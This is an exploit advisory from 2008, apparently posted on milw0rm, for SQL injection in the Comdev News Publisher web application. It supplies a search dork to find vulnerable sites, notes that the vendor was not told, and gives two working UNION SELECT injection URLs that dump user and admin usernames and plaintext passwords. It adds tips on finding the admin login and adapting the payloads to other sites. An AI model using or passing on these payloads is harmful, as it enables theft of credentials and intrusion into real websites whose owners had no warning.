--==+================================================================================+==-- --==+ Comdev News Publisher SQL Injection Vulnerbilitys +==-- --==+================================================================================+==-- Discovered By: t0pP8uZz & xprog Discovered On: 4 April 2008 SITE: www.comdevweb.com DORK (altavista.com/google): "Powered by Comdev News Publisher" VENDOR Has Not Been Notified! DESCRIPTION: Comdev News Publisher, suffers from insecure sql querys, which allows malicous users to pull data from the database and view admin/user passwords in plaintext. EXPLOITS: All Users: www.site.com/index.php?arcyear=-1&arcmonth=-1/**/UNION/**/ALL/**/SELECT/**/1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11/**/FROM/**/sys_user/* Admin: http://site.com/index.php?arcyear=-1&arcmonth=-1/**/UNION/**/ALL/**/SELECT/**/1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11/**/FROM/**/sys_user/**/WHERE/**/permission=0x414C4C/* NOTE/TIP: admin login is located at /oneadmin/ some sites use .htm/.html extensions instead of .php and some sites use "main" instead of "index" they do this using a modified htaccess file, no worries the injections will still work just change "index.php" in the above injections. GREETZ: milw0rm.com, h4ck-y0u.org ! --==+================================================================================+==-- --==+ Comdev News Publisher SQL Injection Vulnerbilitys +==-- --==+================================================================================+==-- # milw0rm.com [2008-04-04]